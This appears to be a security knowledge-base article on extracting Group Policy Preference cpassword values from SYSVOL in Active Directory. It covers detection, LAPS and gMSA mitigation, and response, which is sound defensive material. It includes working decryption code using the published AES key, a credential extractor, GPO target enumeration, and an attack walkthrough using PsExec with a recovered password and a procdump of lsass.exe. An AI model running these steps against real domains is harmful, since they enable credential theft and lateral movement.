Plaintext Password Extraction

Within Active Directory, Group Policies (or Group Policy Objects) permit administrators to centrally manage configurations applied to domain-joined servers and workstations. Group Policies define policies (enforced settings) and preferences, which propagate default configurations that a user can modify. While Group Policies are an essential part of managing a healthy Active Directory-managed environment, administrators can occasionally run afoul of security best-practices.

One such example was the ability to embed passwords in Group Policy Preferences that create local users and groups, configure services and scheduled tasks, or map network drives. While this eased administrative burdens, the password is stored in the preference XML (the cpassword attribute) encrypted with AES-256 under a single static key that Microsoft itself published in the MS-GPPREF protocol specification. Any adversary able to read these policy files can therefore extract and decrypt the passwords at will; the "encryption" adds no protection at all.

In May 2014, Microsoft released security bulletin MS14-025, whose update removes the ability to create new preferences with embedded passwords from the Group Policy Management Console. The update does nothing about preferences that already exist, and many organizations still have Group Policy Preferences with embedded passwords to this day.

Threat Summary

Target: Active Directory
ATT&CK® Tactic:
ATT&CK Technique:

Difficulty
Detection: Low
Mitigation: Low
Response: Low

How Plaintext Password Extraction Works

Step 1: Group Policy Preferences are stored as XML files under the SYSVOL share on every domain controller, beneath each policy's folder (\\domain\SYSVOL\domain\Policies\{GPO GUID}\Machine or User\Preferences\...). SYSVOL is readable by Authenticated Users, so once an adversary holds any domain account they can read its contents. An adversary can parse these files by hand, looking for the cpassword attribute, which holds the encrypted password; neighbouring attributes supply the rest (the account name in userName, accountName or runAs depending on the preference type, plus newName and the changed timestamp). The preference types that can carry a password are local users and groups (Groups.xml), services (Services.xml), scheduled tasks (ScheduledTasks.xml), data sources (DataSources.xml), drive maps (Drives.xml) and printers (Printers.xml). Tools such as PowerSploit's Get-GPPPassword cmdlet automate finding and decrypting them.

PS> Import-Module PowerSploit
PS> Get-GPPPassword
 
Changed   : {2020-08-17 11:14:01}
UserNames : {Administrator (built-in)}
NewName   : [BLANK]
Passwords : {WhatAGreatPassword123!}
File      : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml
 
PS> 
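What Get-GPPPassword does under the hood, as an added example that is not part of the original page or of PowerSploit: the key is the static 32-byte AES-256 key Microsoft publishes in the MS-GPPREF specification (section 2.2.1.1.4), the IV is sixteen zero bytes, and the decrypted bytes are the password in UTF-16LE. The Groups.xml content written to a temporary file at the end is constructed from the fragment shown in this page's detection sample output; the function names are my own.

```powershell
# Added example: decrypt GPP cpassword values and pull credentials out of a preference XML file.

function ConvertFrom-GPPCPassword {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [string]$CPassword
    )
    process {
        # Static AES-256 key published in MS-GPPREF 2.2.1.1.4; every GPP password is encrypted with it.
        $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                        0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

        # The XML stores Base64 with the trailing '=' padding stripped; restore it before decoding.
        $text       = $CPassword.Trim()
        $text      += '=' * ((4 - ($text.Length % 4)) % 4)
        $cipherText = [Convert]::FromBase64String($text)

        $aes = [System.Security.Cryptography.Aes]::Create()
        try {
            $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
            $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
            $aes.Key     = $key
            $aes.IV      = New-Object byte[] 16        # all-zero IV, as the specification requires
            $decryptor   = $aes.CreateDecryptor()
            $plainBytes  = $decryptor.TransformFinalBlock($cipherText, 0, $cipherText.Length)
            # The decrypted bytes are the password encoded as UTF-16LE.
            [System.Text.Encoding]::Unicode.GetString($plainBytes)
        }
        finally {
            $aes.Dispose()
        }
    }
}

function Get-GPPCredentialFromXml {
    param([Parameter(Mandatory)][string]$Path)
    [xml]$doc = Get-Content -Path $Path -Raw
    # Every preference type stores the password the same way: a cpassword attribute on <Properties>.
    foreach ($props in $doc.SelectNodes('//*[@cpassword]')) {
        $cpassword = $props.GetAttribute('cpassword')
        if (-not $cpassword) { continue }     # empty cpassword means no password is set
        # The account attribute name varies by preference type (userName, accountName, runAs).
        $accountAttr = $props.Attributes |
            Where-Object { $_.Name -in 'userName','accountName','runAs' } |
            Select-Object -First 1
        $account = if ($accountAttr) { $accountAttr.Value } else { $null }
        [pscustomobject]@{
            Changed  = $props.ParentNode.GetAttribute('changed')
            Type     = $props.ParentNode.LocalName     # User, NTService, Task, Drive, ...
            Account  = $account
            NewName  = $props.GetAttribute('newName')
            Password = ConvertFrom-GPPCPassword -CPassword $cpassword
            File     = $Path
        }
    }
}

# Constructed sample: the Machine\Preferences\Groups\Groups.xml fragment shown in this page's detection section.
$sampleXml = @'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01" uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User></Groups>
'@
$samplePath = Join-Path ([System.IO.Path]::GetTempPath()) 'Groups.xml'
Set-Content -Path $samplePath -Value $sampleXml -Encoding UTF8
Get-GPPCredentialFromXml -Path $samplePath | Format-List
```

Point Get-GPPCredentialFromXml at any of the six preference file types from SYSVOL and it returns one object per stored credential; the XPath match on any element with a cpassword attribute is what makes it independent of the file type.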

Step 2: With the username and password of a local administrator account in hand, the adversary enumerates the computers in Active Directory to which the Group Policy is linked (for a Machine-side preference, every computer beneath the linked containers, subject to any security or WMI filtering on the GPO). That yields a list of hosts on which this credential is expected to work.

With that list, the adversary expands their footprint across the organization. In this example, the adversary connects to another computer with PsExec and takes a memory dump of the LSASS process, from which further credentials can be recovered for lateral movement or privilege escalation.

PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml
 
PS> $XML.GPO.LinksTo
 
SOMName SOMPath       Enabled NoOverride
------- -------       ------- ----------
Comp    domain.com/Comp true    false
 
 
PS> $SOMName = $XML.GPO.LinksTo.SOMName
PS> $DN = Get-ADOrganizationalUnit -Filter "Name -eq '$SOMName'" | Select-Object -ExpandProperty DistinguishedName
 
PS> Get-ADComputer -filter "*" -SearchBase $DN
 
 
DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com
DNSHostName       :
Enabled           : True
Name              : Server1
ObjectClass       : computer
ObjectGUID        : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf
SamAccountName    : SERVER1$
SID               : S-1-5-21-5840559-2756745051-1363507867-16924
UserPrincipalName :
 
 
PS> .\PsExec.exe \\server1 -u Administrator -p WhatAGreatPassword123! powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
PS>
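A more general form of the enumeration in Step 2, as an added example written for this page and not taken from the original: it converts every SOMPath the GPO is linked to (the domain root or nested OUs) into a distinguished name and lists the computers beneath each, instead of assuming a single OU link whose name is unique. ConvertTo-SomDistinguishedName is pure and runs anywhere; Get-GPOTargetComputer assumes the GroupPolicy and ActiveDirectory RSAT modules and a domain connection. Both function names are my own.

```powershell
# Added example: resolve all container links of a GPO and list the computers beneath them.

function ConvertTo-SomDistinguishedName {
    param([Parameter(Mandatory)][string]$SomPath)   # e.g. "domain.com/Comp" from a GPO report's LinksTo
    $parts = $SomPath.Trim('/') -split '/'
    # The first component is the DNS domain name: each label becomes a DC= component.
    $domainDn = ($parts[0] -split '\.' | ForEach-Object { "DC=$_" }) -join ','
    # The remaining components are OUs listed parent-first; a DN lists them child-first, so reverse.
    $ous = @($parts | Select-Object -Skip 1)
    if ($ous.Count -eq 0) { return $domainDn }      # linked at the domain root
    [array]::Reverse($ous)
    # Escape the characters that are special in an RDN (comma, plus, quote, backslash, <, >, ;, =).
    $ouDn = ($ous | ForEach-Object { 'OU=' + ($_ -replace '([,+"\\<>;=])', '\$1') }) -join ','
    return "$ouDn,$domainDn"
}

function Get-GPOTargetComputer {
    param([Parameter(Mandatory)][guid]$Guid)
    [xml]$report = Get-GPO -Guid $Guid | Get-GPOReport -ReportType Xml
    # LinksTo is absent for an unlinked GPO, one element for a single link, an array for several.
    foreach ($link in @($report.GPO.LinksTo)) {
        if ($null -eq $link) { continue }
        if ($link.Enabled -ne 'true') { continue }       # a disabled link applies nothing
        $searchBase = ConvertTo-SomDistinguishedName -SomPath $link.SOMPath
        Get-ADComputer -Filter * -SearchBase $searchBase -SearchScope Subtree -Properties OperatingSystem, LastLogonDate |
            Select-Object Name, DNSHostName, OperatingSystem, LastLogonDate,
                          @{ Name = 'LinkedAt'; Expression = { $link.SOMPath } }
    }
}

# Runs offline: the SOMPath from the page's report above.
ConvertTo-SomDistinguishedName -SomPath 'domain.com/Comp'

# Requires a domain connection; the GUID is the GPO from the page's example.
# Get-GPOTargetComputer -Guid '5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB' | Format-Table -AutoSize
```

Two limits worth knowing when reading the result: the list is an upper bound, because security filtering and WMI filters on the GPO can exclude computers under a linked container, and site links are not handled, since their SOMPath does not map to a domain DN this way. A User-side preference (under the User\Preferences folder) applies to user objects under the link, not to the computers listed here.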

Detect, Mitigate, and Respond

Detection (Difficulty: Low)

SYSVOL is read by every domain member during normal Group Policy processing, so file-access auditing on the share cannot distinguish an adversary reading these XML files from a client refreshing policy; direct detection of the read is not practical. What can be done is to audit for the condition itself, using the same technique an adversary would. Running the Get-GPPPassword cmdlet against each domain enumerates every embedded password (note that its output contains the plaintext, so handle and store it accordingly). Alternatively, the following PowerShell snippet lists the files that contain a cpassword attribute without decrypting anything:

# Replace this path with the path to the SYSVOL share to check
$SYSVOL_Path = "\\domain.com\sysvol"

# Only the preference XML files can contain a cpassword attribute; -Recurse is needed for -Include to apply.
# Hits also include preferences whose cpassword is empty (no password set), so check the value in each match.
Get-ChildItem $SYSVOL_Path -Recurse -File -Include *.xml | Select-String -Pattern "cpassword"

# Sample Output using \\domain.com\sysvol (a single match)
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01" uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
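An audit that walks SYSVOL and reports every preference carrying a non-empty cpassword without decrypting it, as an added example that is not part of the original page. It looks only at the six preference file types that can hold a password, takes the GPO GUID and the Machine/User scope from the folder structure, and never emits the value, so the report can be handed to the policy owners. The function name is my own; the tree it runs against at the end is constructed in a temporary directory from this page's Groups.xml sample so the script runs offline.

```powershell
# Added example: report GPP preferences that carry a password, without revealing it.

function Find-GPPEmbeddedPassword {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$SysvolPath    # e.g. \\domain.com\SYSVOL
    )
    # Only these preference types can carry a cpassword attribute.
    $passwordFiles = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'

    Get-ChildItem -Path $SysvolPath -Recurse -File -Include $passwordFiles -ErrorAction SilentlyContinue |
        # Keep files in <GUID>\Machine|User\Preferences\<Type>\ and ignore stray copies elsewhere.
        Where-Object { $_.Directory.Parent -and $_.Directory.Parent.Name -eq 'Preferences' } |
        ForEach-Object {
            $file     = $_
            $scopeDir = $file.Directory.Parent.Parent     # Machine or User
            $gpoDir   = $scopeDir.Parent                  # {GUID}
            # Match only elements whose cpassword is non-empty; an empty value means no password is set.
            Select-Xml -LiteralPath $file.FullName -XPath '//*[@cpassword][string-length(@cpassword) > 0]' -ErrorAction SilentlyContinue |
                ForEach-Object {
                    $props = $_.Node
                    # The account attribute name depends on the preference type.
                    $accountAttr = $props.Attributes |
                        Where-Object { $_.Name -in 'userName','accountName','runAs' } |
                        Select-Object -First 1
                    $account = if ($accountAttr) { $accountAttr.Value } else { $null }
                    [pscustomobject]@{
                        GpoGuid   = $gpoDir.Name
                        Scope     = $scopeDir.Name
                        Type      = $props.ParentNode.LocalName   # User, NTService, Task, Drive, ...
                        Account   = $account
                        Action    = $props.GetAttribute('action')
                        Changed   = $props.ParentNode.GetAttribute('changed')
                        CPassword = '<set, not decrypted>'
                        File      = $file.FullName
                    }
                }
        }
}

# Constructed sample tree mirroring \\domain.com\SYSVOL\domain.com\Policies\{GUID}\Machine\Preferences\Groups\Groups.xml
$root = Join-Path ([System.IO.Path]::GetTempPath()) ('sysvol-' + [guid]::NewGuid())
$dir  = Join-Path $root 'domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" changed="2020-08-17 11:14:01" uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" userName="Administrator (built-in)"/></User></Groups>
'@ | Set-Content -Path (Join-Path $dir 'Groups.xml') -Encoding UTF8

Find-GPPEmbeddedPassword -SysvolPath $root | Format-List
Remove-Item -LiteralPath $root -Recurse -Force
```

Against a real domain, pass the SYSVOL share itself (Find-GPPEmbeddedPassword -SysvolPath '\\domain.com\SYSVOL') and run it once per domain in the forest; the GpoGuid column feeds straight into Get-GPO -Guid to find the policy's display name and owner.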

Mitigate (Difficulty: Low)

Put simply, embedded passwords in Group Policy Preferences should be removed. Additionally:

  • Ensure the systems used to manage Group Policy (domain controllers and any administrative workstations running the Group Policy Management Console) are on current operating system versions with the latest patches. Current versions of Windows Server, and any system with the MS14-025 update, refuse to create preferences with embedded passwords. This only prevents new ones; existing preferences still have to be found and removed.
  • Replace the use of Group Policy Preferences to set the built-in local administrator account's password with a robust solution such as Microsoft's Local Administrator Password Solution (LAPS), which gives every computer a unique, rotated password stored in a protected attribute.
  • Adopt solutions that replace embedded passwords with authenticated, dynamic lookups, for example group Managed Service Accounts (gMSA) for services and scheduled tasks, so that no static secret needs to be written into policy at all.

Respond (Difficulty: Low)

Should you discover embedded passwords in Group Policy Preferences, take the following actions:

  • Remove the password from the Group Policy Preference (edit the preference so it no longer sets a password, or delete the preference item) and confirm the cpassword attribute is gone from the XML in SYSVOL.
  • Treat the password as compromised and reset it everywhere it was applied. A Machine-side Groups.xml preference set the same local account password on every computer the policy reached, so each of those accounts needs a new, unique password (which is what LAPS provides). Review logons by that account on the affected computers for signs the credential was already used.
